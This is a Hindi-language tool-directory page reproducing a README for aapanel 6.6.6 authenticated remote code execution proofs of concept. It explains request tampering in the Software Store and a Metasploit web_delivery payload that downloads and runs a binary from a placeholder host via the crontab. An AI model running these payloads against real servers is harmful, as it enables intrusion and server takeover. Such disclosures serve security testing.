Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
aapanel — aapanel 6.6.6 - (Authenticated) Remote Code Execution | Kitploit
उपकरण/GitHubGitHub/jenaye/aapanel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (Authenticated) Remote Code Execution

रिपॉजिटरी देखें
276 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • विवरण : दूरस्थ प्रमाणित उपयोगकर्ताओं को Sotfware Store के सेटिंग मेनू के माध्यम से मनमाना कमांड निष्पादित करने की अनुमति देता है।
  • प्रभावित संस्करण : सभी <= 6.6.6

जानकारी

इस PoC को बनाने के लिए, मैंने docker-compose का उपयोग करके सॉफ़्टवेयर इंस्टॉल किया।

  • भेद्यता प्रकार : रिमोट कमांड निष्पादन (प्रमाणित RCE)

POC

Software Store पर जाएं, सेटिंग फ़ील्ड में किसी भी पंक्ति पर क्लिक करें, जब आप "start/stop/restart" पर क्लिक करें तो अनुरोध को इंटरसेप्ट करें और जो चाहें उसे निष्पादित करने के लिए अनुरोध को संशोधित/संपादित करें। यहाँ curl के साथ एक उदाहरण है :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • विवरण : हमलावर को दूरस्थ रूप से मनमाना कमांड चलाने की अनुमति देता है
  • प्रभावित संस्करण : सभी <= 6.6.6

जानकारी

इस PoC को बनाने के लिए, मैंने नया Ubuntu 20.04 इंस्टॉल किया, फिर wget + sudo इंस्टॉल किया और यह स्क्रिप्ट निष्पादित की wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • भेद्यता प्रकार : रिमोट कमांड निष्पादन (प्रमाणित RCE)

POC

सबसे पहले, web_delivery विकल्प सेट करें, यह एक पेलोड और एक लिसनर बनाएगा।

web_delivery

अब इसे चलाएं

run

यह निम्नलिखित पेलोड उत्पन्न करेगा:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

फिर इसे aapanel के crontab मेनू के script content में इसी तरह कॉपी/पेस्ट करें।

cron

अब बस अपने crontab को निष्पादित करें और अपने सत्र की प्रतीक्षा करें।

command

तेज़ एक्सप्लॉइट

बस msfconsole -r aapanel.rc चलाएं पेलोड को script content अनुभाग में कॉपी/पेस्ट करें, और अपने सत्र का आनंद लें।

टूल डाउनलोड करें